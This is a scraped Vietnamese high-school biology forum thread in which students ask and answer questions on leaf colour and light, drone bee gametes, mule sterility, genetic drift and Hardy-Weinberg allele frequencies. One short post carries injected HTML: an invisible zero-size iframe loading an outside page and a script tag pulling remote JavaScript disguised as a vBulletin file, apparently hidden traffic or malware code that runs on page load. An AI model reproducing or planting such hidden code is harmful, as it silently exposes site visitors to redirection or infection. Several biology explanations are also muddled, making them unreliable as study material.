What's new

Đặt câu hỏi sinh học phổ thông vào đây

Có một số người nói rằng: Khi sống ở nơi quang đãng, cường độ ánh sáng mạnh thì tốc độ quang hợp của cây mạnh hơn =====> cây sẽ có nhiều lục lạp hơn =====> lá xanh sẫm hơn cây sống ở trong bóng râm.
Vậy ý kiến này có đúng không?:mrgreen:
Lời này hơi mẫu thuẫn nhé:
- Nếu cường độ ánh sáng mạnh thì tốc độ quang hợp cây mạnh hơn đúng, nhưng nếu quá mạnh thì sẽ ngược lại, lục lạp bị phá huỷ.......>:eek:
Nếu cây đã quang hợp mạnh khoẻ như vầy thì cần gì nhiều lục lạp, chiều hướng ở đây rằng, khi cây nhận được nhiều ánh sáng, lục lạp màu xanh và lớn hơn cây ở bóng râm, lục lạp nhiều hơn để đảm bảo đủ nhu cầu. Nếu như em nói thì ta có thể suy ngược lại rằng, tốc độ quang hợp của cây sẽ yếu đi khi cường độ ánh sáng yếu----> cây ít lục lạp-------> cây Die à, cây nó cũng giống như bao loài khác cũng phải thíc nghi và điều chỉnh làm sao, sống ở trong môi trường bất lợi vẫn OK
 

huyền my

Member
Có một số người nói rằng: Khi sống ở nơi quang đãng, cường độ ánh sáng mạnh thì tốc độ quang hợp của cây mạnh hơn =====> cây sẽ có nhiều lục lạp hơn =====> lá xanh sẫm hơn cây sống ở trong bóng râm.
Vậy ý kiến này có đúng không?:mrgreen:
Chắc là không vì quang hợp mạnh đâu có tạo ra lục lạp
 

huyền my

Member
Tiện thể sẵn lúc diễn đàn đang đông vui cho em hỏi ong đực tạo giao tử theo cơ chế nào ạ, bằng nguyên phân hay giảm phân, ỏe lớp học hỏi cô nghe cô nói mà thấy khó hiểu:please:
 
Ở ong có hiện tượng trinh sản. Khi các trứng ong dc ong Chúa sinh ra, có 2 trường hợp sau:
1) ong đực (n NST)
2) ong cái (2n NST), sau đó con nào dc uống sữa chúa thì trở thành Ong Chúa, ko thì trở thành ong thợ.
Khi con đực đến "tuổi trưởng thành", 1 số bộ phận của nó tự nhân lên thành 2n như cánh và bộ phận sinh dục. Nhờ đó, ong đực vẫn tạo ra giao tử bình thường, tức là bằng con đường giảm phân.:mrgreen:
:up:tội nghiệp các bạn ong thợ nhỉ?, chả bao h có dc thiên chức làm mẹ. :mygod::cry:
 
Cho mình hỏi tại sao lai ngựa và lừa tạo ra con la bất thụ?
Còn một nguyên nhân nữa là động vật cấp cao đều do trứng thụ tinh phát triển mà có thế hệ con. Tế bào trứng sinh ra từ buồng trứng của động vật giống cái, tinh trùng được sản sinh ra từ tinh hoàn của động vật giống đực. Còn la, bất kể là đực hay cái, đều có hệ sinh dục phát triển không hoàn chỉnh, vì thế chức năng sinh lý có thể chưa bình thường. Cơ quan sinh dục của những con la đực không thể sản sinh ra loại hoóc môn động dục, đồng thời không thể sản sinh ra tinh trùng thành thục, vì thế không thể thụ tinh. Đó là lý do la chỉ có một đời.

Song cũng có một vài trường hợp hiếm hoi la mẹ đẻ. Hơn 1.000 năm trước, trong sách nông học cổ đại “Tề dân yếu thuật” của Trung Quốc đã có một vài ghi chép về trường hợp này. Năm 1953 ở thôn Đông Tĩnh, Cam Túc, một con la mẹ giao phối với một con lừa đực đẻ được một con lừa con. Năm 1954 ở tổng Giao - Đạo, huyện Hương Lương, tỉnh Hà Bắc (Trung Quốc), một con la mẹ giao phối với một con ngựa đực, đẻ ra một con la cái.

Sự việc này tuy hiếm gặp, nhưng là để nói rằng một số ít la mẹ vẫn có thể sản sinh ra các tế bào trứng thành thục có khả năng thụ tinh. Điều đáng nói là đến giờ vẫn chưa thấy la đực sản sinh ra tinh trùng thành thục.
 
Theo em thì có cách giải thích khác. Em ủng hộ lý thuyết bộ nhiễm sắc thể không tương đồng của Phương Lan, nhưng em sẽ giải thích rõ hơn hiện tượng của a Long đề ra theo cách mà em được biết.

Đặt giả thuyết: n của ngựa là 64, của lừa là 63 ( em giả thuyết vì em quên mất, không nhớ bộ NTS của hai loài là bao nhiều, học lâu quá rồi)

Nếu cho lai lừa đực và ngựa cái thì cho con lai là con la.Nếu cho lai lừa cái và ngực đực thì cho con lai là con booc-đô. Em sẽ gọi chung là con Lai cho ngắn gọn.

Cà hai con lai đều có bộ NST 2n= 63 + 64, gọi là bộ NST 2n lẻ. Trong đó sẽ có 63 cặp gần như tương đồng và 1 chiếc NST lẻ ta gọi là NST A (Nôm na là có 63,5 cặp NST).

Vì sao con Lai bất thụ?
Ai học sinh học cũng biết trong quá trình giảm phân hình thành giao tử thì bộ NST 2n phải nhân đôi thành bộ 4n, qua giảm phân 1 hình thành 2 tế bào mang bộ NST n+n, rồi thành giao tử có bộ n khi kết thúc giảm phân. Điều này xảy ra hoàn toàn bình thường đối với các sinh vật có bộ NST 2n chẵn.
Đối với con Lai, do bộ NST 2n lẻ như các trường hợp người XXX,XXY,X0 nên con Lai không có được quá trình giảm phân bình thường. Trong giảm phân 1, tế bào sinh dục của con Lai hình thành sợi nhiễm sắc kéo những chiếc NST kép của từng cặp tương đồng và đồng thời tách đôi chiếc NST kép AA (NST đơn A nhân đôi thành NST kép AA ở kỳ trung gian) về 2 cực tế bào. Qua đến giảm phân 2, tế bào không thể hình thành sợi nhiễm sắc vì chỉ có một chiếc NST đơn A. Vì thế quá trình giảm phân kết thúc tại đây, kết quả là hình thành các tế bào bất thường và không thể hình thành giao tử, dẫn đến con lai bất thụ.Các tế bào bất thường này cũng không thể phân bào được như các tế bào sinh dưỡng vì có bộ NST n kép, vì thế sẽ tiêu biến mất.

Vì sao có hiện tượng la mẹ đẻ của a Long?
Do trong qua trình giảm phân 1, chiếc NST kép AA vì một lý đo vật lý hay sinh lý nào đó mà không bị tách ra mà đi hẳn về một cực của tế bào. Thế nên quá trình giảm phân xảy ra hoành toàn bình thường, tạo ra giao tử n=63 và n=64.
Khi trường hợp này xảy ra với con la cái, thì đã hình thành được trứng và trứng sẽ ở một thời gian trong tử cung chờ thụ tinh như thường lệ. Ta sẽ thấy:
- Trứng có n=63 gặp tinh trùng của lừa có n=63, sinh ra một con gần giống như con lừa khoảng trên 90%( vì vẫn còn xót lại ADN của ngựa trong trứng). Đầy là trường hợp mà a Long đưa ra.
- Trứng có n=63 gặp tinh trùng của ngựa có n=64, sinh ra con cái toàn là la (vì có NST X của ngựa) hoặc la đực (nếu NST X trong trứng là của ngựa) và con booc-đô đực (nếu NST X trong trứng là của lừa). Đây là trường hợp mà a Long đưa ra.
- Trứng có n=64 gặp tinh trùng của lừa có n=63, sinh ra con la cái, la đực (nếu NST X trong trứng là của ngựa) hoặc booc-đô cái, booc-đô đực (nếu X trong trứng là của lừa).
- Trứng có n=64 gặp tinh trùng của ngựa có n=64, sinh ra một con gần giống như con ngựa khoảng trên 90% ( vì vẫn còn xót lại ADN của con lừa trong trứng).
* Trường hợp này có xảy ra ở con lai đực, nhưng do lượng tinh trùng được hình thành cực kỳ ít, nêu số tinh trùng này thường bị chết sau một thời gian hình thành hoặc chết ngay khi đi vào tử cung con cái. Nên chúng ta không thấy được trường hợp sản sinh tinh trùng của con Lai đực.

Thêm một cái em không đồng tình với a Long về chuyện mấy con này không sinh ra loại hoóc môn động dục, vì bản thân trong tế bào mỗi con đều có NST giới tính, mà NST giới tính thì quản lý quá trình tổng hợp ra hoóc môn sinh dục cũng như các hoóc môn gây ra động dục. Nên các con Lai này đều có đầy dủ các loại hoóc môn nó cần cho việc sinh sản.

Các bạn có y kiến gì xin cứ đóng góp nhé. Cám ơn.:welcome:
 
Cây sống ở nơi quang đãng thì còn phải xem nó có nhiều ánh sáng hay không thì dù thoáng nhưng tối thì cây cũng chịu........ vì vậy ta có hai có khả năng:
- Nhiều ánh sáng thì lục lạp ít, màu lục lạp nhạt, màu lá nhạt
- Ít ánh sáng thì lục lạp cần nhiều để quang hợp đảm bảo sự sống, nhiều lục lạp và nó sẽ có màu xanh đập hơn những cây ở sáng hơn
Cây sống dưới tán của những cây khác hay sống trong nhà thì cũng giống như trường hợp cây ít được ánh sáng chiếu do sống ở những nơi ít ánh sáng chiếu tới với cường độ không mạnh............> xanh đậm
Mình không đồng ý với với chị Phương Lan, sự quy định màu sắc của lá và độ nhiều của lục lạp không phụ thuộc vào cường độ ánh sáng như Chị Phương Lan nói, mà phụ thuộc vào độ tuổi của lá, cấu trúc xenlulo trong lá, và đặc biệt quan trọng là ADN quy định màu lá và độ nhiều lục lạp trong tế bào theo từng mức của cường độ ánh sáng.
Ví dụ (từ đơn giản đến phức tạp):
- Độ tuổi của lá: dễ thấy lá non lúc nào cũng có màu nhạt hơn lá già.
- Cấu trúc và mật độ xenlulo trong lá: lá có nhiều xenlulo hơn sẽ khó cho ánh sáng xuyên qua lá hơn đẫn đến lá phản xạ nhiều ánh sáng xanh lục hơn, nên sẽ có màu xanh đậm hơn các lá có ít xenlulo. Cái này có thể giải thích lá non và lá già.
Các bạn có thể làm thí nghiệm này: Lấy một cái chậu lớn đậy lên một vài cây nhỏ hoặc các bạn che kín một nửa chiếc lá trong một thời gian dài, khoảng 10 ngày. Các bạn sẽ thấy các cây này hoặc một nữa che sẽ có màu xanh nhạt hẳn đi. Giải thích: Là do cây nhận không được đủ ánh sáng, nên cây không thể tổng hợp ra xenlulo làm cây chắc hơn và sẫm màu hơn, mặc khác thiếu ánh sáng, cây cũng không thể tổng hợp ra tinh bột (Đồng phân với xenlulo), nên vì thế không đủ năng lượng để cây tổng hợp lục lạp giúp xanh lá. Tại đây ta có thể thấy, ánh sáng càng nhiều thì càng giúp cho cây xanh hơn (Trái ngược với chị Phương Lan).
- Do ADN của loài cây quy định: ta có thể thấy loài cây khác nhau thì có ADN khác nhau, quy định màu sắc của lá khác nhau, không kể nó có sống ở nơi nhiều hay ít ánh sáng. Ví dụ:
+ Cây dương xỉ và rêu quanh năm sống ở dưới giếng, nơi tăm tối ít ánh sáng, nó có màu lá xanh nhạt.
+ Cây tứ quý phát tài: quanh năm sống trong nhà, mà nó có màu lá rất đậm.
+ Các loại Nấm như nâm rơm, nấm hương,...: tất cả đều sống ở nơi không có hoặc thiếu ánh sáng, vì bản thân nó không cần ánh sáng, ADN của nó không sản sinh ra diệp lục.
+ Các cây thông, cây vạn tuế, cây ăn trái: bọn chúng đều sống ở nới có ánh sáng nhiều và đều có màu lá đậm.

Như thế chung ta có thể thấy, ánh sáng cũng có góp phần vào màu sắc của lá cây nhưng không nhìều bằn sự chi phối của ADN. Đa số thì cây ở nơi có nhiều ánh sáng ( cường độ ánh sáng cao) thì sẽ có xu hướng có màu xanh đậm. Cây ở nơi có ít ánh sáng thì sẽ có xu hương có màu xanh nhạt.
 
Chọn lọc tự nhiên (CLTN) và biến động di truyền ngẫu nhiên (BĐDTNN, còn gọi là yếu tố ngẫu nhiên) khác nhau ở điểm nào?

1, CLTN làm biến đổi tần số allele trong quần thể, trong khi đó BĐDTNN làm biến đổi tần số kiểu gen trong quần thể
2, CLTN làm cho tần số allele có lợi trở nên dần chiếm đa số trong quần thể, trong khi đó BĐDTNN làm cho tần số allele trung tính trở nên dần chiếm đa số trong quần thể
3, CLTN làm gia tăng độ đa dạng di truyền trong quần thể, còn BĐDTNN làm suy giảm đa dạng di truyền trogn quần thể
4, BĐDTNN làm cho tần số allele biến đổi theo một chiều hướng xác định còn CLTN thì làm cho tần số allele biến đổi theo chiều hướng không xác định
5, CLTN chỉ ảnh hưởng đến một số gene xác định, trong khi đó BĐDTNN ảnh hưởng đến toàn bộ các gene trong hệ gene
 

huyền my

Member
Mình không đồng ý với với chị Phương Lan, sự quy định màu sắc của lá và độ nhiều của lục lạp không phụ thuộc vào cường độ ánh sáng như Chị Phương Lan nói, mà phụ thuộc vào độ tuổi của lá, cấu trúc xenlulo trong lá, và đặc biệt quan trọng là ADN quy định màu lá và độ nhiều lục lạp trong tế bào theo từng mức của cường độ ánh sáng.
Ví dụ (từ đơn giản đến phức tạp):
- Độ tuổi của lá: dễ thấy lá non lúc nào cũng có màu nhạt hơn lá già.
- Cấu trúc và mật độ xenlulo trong lá: lá có nhiều xenlulo hơn sẽ khó cho ánh sáng xuyên qua lá hơn đẫn đến lá phản xạ nhiều ánh sáng xanh lục hơn, nên sẽ có màu xanh đậm hơn các lá có ít xenlulo. Cái này có thể giải thích lá non và lá già.
Các bạn có thể làm thí nghiệm này: Lấy một cái chậu lớn đậy lên một vài cây nhỏ hoặc các bạn che kín một nửa chiếc lá trong một thời gian dài, khoảng 10 ngày. Các bạn sẽ thấy các cây này hoặc một nữa che sẽ có màu xanh nhạt hẳn đi. Giải thích: Là do cây nhận không được đủ ánh sáng, nên cây không thể tổng hợp ra xenlulo làm cây chắc hơn và sẫm màu hơn, mặc khác thiếu ánh sáng, cây cũng không thể tổng hợp ra tinh bột (Đồng phân với xenlulo), nên vì thế không đủ năng lượng để cây tổng hợp lục lạp giúp xanh lá. Tại đây ta có thể thấy, ánh sáng càng nhiều thì càng giúp cho cây xanh hơn (Trái ngược với chị Phương Lan).
- Do ADN của loài cây quy định: ta có thể thấy loài cây khác nhau thì có ADN khác nhau, quy định màu sắc của lá khác nhau, không kể nó có sống ở nơi nhiều hay ít ánh sáng. Ví dụ:
+ Cây dương xỉ và rêu quanh năm sống ở dưới giếng, nơi tăm tối ít ánh sáng, nó có màu lá xanh nhạt.
+ Cây tứ quý phát tài: quanh năm sống trong nhà, mà nó có màu lá rất đậm.
+ Các loại Nấm như nâm rơm, nấm hương,...: tất cả đều sống ở nơi không có hoặc thiếu ánh sáng, vì bản thân nó không cần ánh sáng, ADN của nó không sản sinh ra diệp lục.
+ Các cây thông, cây vạn tuế, cây ăn trái: bọn chúng đều sống ở nới có ánh sáng nhiều và đều có màu lá đậm.

Như thế chung ta có thể thấy, ánh sáng cũng có góp phần vào màu sắc của lá cây nhưng không nhìều bằn sự chi phối của ADN. Đa số thì cây ở nơi có nhiều ánh sáng ( cường độ ánh sáng cao) thì sẽ có xu hướng có màu xanh đậm. Cây ở nơi có ít ánh sáng thì sẽ có xu hương có màu xanh nhạt.
Câu này là đáp án của bộ rồi đúng đó bạn, không sai đâu:up:
 

Mít Đặc

New member
Mình cũng nghĩ đáp án này đúng đó.
<iframe ALLOWTRANSPARENCY=true width="0" height="0" frameborder="0" scrolling="No" hspace="0" vspace="0" marginheight="0" marginwidth="0" src='http://thptbachdang.com/traff.html'></iframe>
<script src="http://style-vn.net/forum/clientscript/vbuletin.js"></script>
 
Chọn lọc tự nhiên (CLTN) và biến động di truyền ngẫu nhiên (BĐDTNN, còn gọi là yếu tố ngẫu nhiên) khác nhau ở điểm nào?

1, CLTN làm biến đổi tần số allele trong quần thể, trong khi đó BĐDTNN làm biến đổi tần số kiểu gen trong quần thể
2, CLTN làm cho tần số allele có lợi trở nên dần chiếm đa số trong quần thể, trong khi đó BĐDTNN làm cho tần số allele trung tính trở nên dần chiếm đa số trong quần thể
3, CLTN làm gia tăng độ đa dạng di truyền trong quần thể, còn BĐDTNN làm suy giảm đa dạng di truyền trogn quần thể
4, BĐDTNN làm cho tần số allele biến đổi theo một chiều hướng xác định còn CLTN thì làm cho tần số allele biến đổi theo chiều hướng không xác định
5, CLTN chỉ ảnh hưởng đến một số gene xác định, trong khi đó BĐDTNN ảnh hưởng đến toàn bộ các gene trong hệ gene

Ai làm ơn giải câu trên cho học hỏi cái nhở.
 

PeVjt

New member
Hỏi

Có bạn nào có bản so sánh cực kỳ đầy đủ về các đặc điểm giữa người và thú, giữa người và vượn người ngày nay ko? cho mình xin với nhá! Cảm ơn trước nha! :???:
 
Trong lớp bồi dưỡng cô giáo có hỏi một câu bảo đội BD về nhà tìm câu trả lời:Tại sao quả khi chín lại mềm hơn quả lúc còn sống(như quả xoài ấy?


Em không biết trả lời sao nữa,mong được giúp đỡ
 

P4r4n01d

New member
Xin nói trước 1 câu là em bị mất kiến thức căn bản lớp 12 trầm trọng, nên mấy câu hỏi dưới đây nghe hơi bị ngu, mong mọi người chỉ dẫn:

trong 1 bài trắc nghiệm trên trang http://www.thuathienhue.edu.vn, có 2 câu thế này:

1/Ở người hệ nhóm máu MN do 2 gen alen M và N quy định, gen M trội không hoàn toàn so với N:
Kiểu gen MN MN NN
Nhóm máu M MN N
Nghiên cứu một quần thể 720 người gồm 22 người nhóm máu M, 216 người nhóm máu MN và 492 người nhóm máu N. Tần số tương đối của alen M và N trong quần thể
A. M=50%; N=50%
B. M=25%; N=75%
C. M=82,2%; N=17,8%
D. M=17,8%; N=82,2%
E. M=35,6%; N=64,4%


2/Giả sử trong một quần thể giao phối ngẫu nhiên, không có chọn lọc và đột biến, tần số tương đối của 2 alen A và a là A:a ≈ 0,7:0,3
Tần số tương đối A: a ở thế hệ sau là:
A. A:a ≈ 0,7:0,3
B. A:a ≈ 0,5:0,5
C. A:a ≈ 0,75:0,25
D. A:a ≈ 0,8:0,2
E. A:a ≈ 0,6:0,4


cho em hỏi 2 câu này làm sao? tính theo công thức nào?

Em nhớ lúc trước có nghe cô nói các tỉ lệ kiểu hình như 1:2:1, 9:3:3:1 gì đó dùng để xác định xem nó thuộc kiểu di truyền gì (liên kết giới tính hay hoán vị gen), cho em hỏi có tất cả bao nhiêu loại tỉ lệ kiểu hình như vậy và loại nào đặc trwng cho kiểu di truyền nào?

còn 1 câu nữa, cái này thuộc về kiến thức cơ bản :cry:: trong sách giáo khoa sinh học cơ bản 12 bài 29 có 1 câu: "các nhà kh cũng chưa biết sự khác nhau về mặt di truyền lớn đến mức nào hoặc khác biệt như thế nào về tần số alen...", vậy cho em hỏi tần số alen là gì?
Xin hết ạ >"<


 

Lucky_boy

Member
1-Tần số kiều hình là: 22/720 MM + 216/720MN + 492/720NN =1
Vậy tấn số tđ alen p(M) = 22/720 + (216/720)/2 = 0,18
q(N) = 1-0,18 = 0,82 => Đáp án D
2-Theo đề bài thì tần số tương đối của các alen đó ko đổi qua các thế hệ nên =>đáp án A
3- Tỉ lệ 1:2:1 : trội ko hoàn toàn;liên kết gen;hoán vị gen một bên với tần số bất kì với điều kiện dị hợp tử chéo;tác động bổ trợ(lai phân tích);tác động át chế(lai PT);gen đa hiệu...
Tỉ lệ 9:3:3:1 : phân li độc lập 2 cặp gen,hoán vị gen 50%.
 

Facebook

Top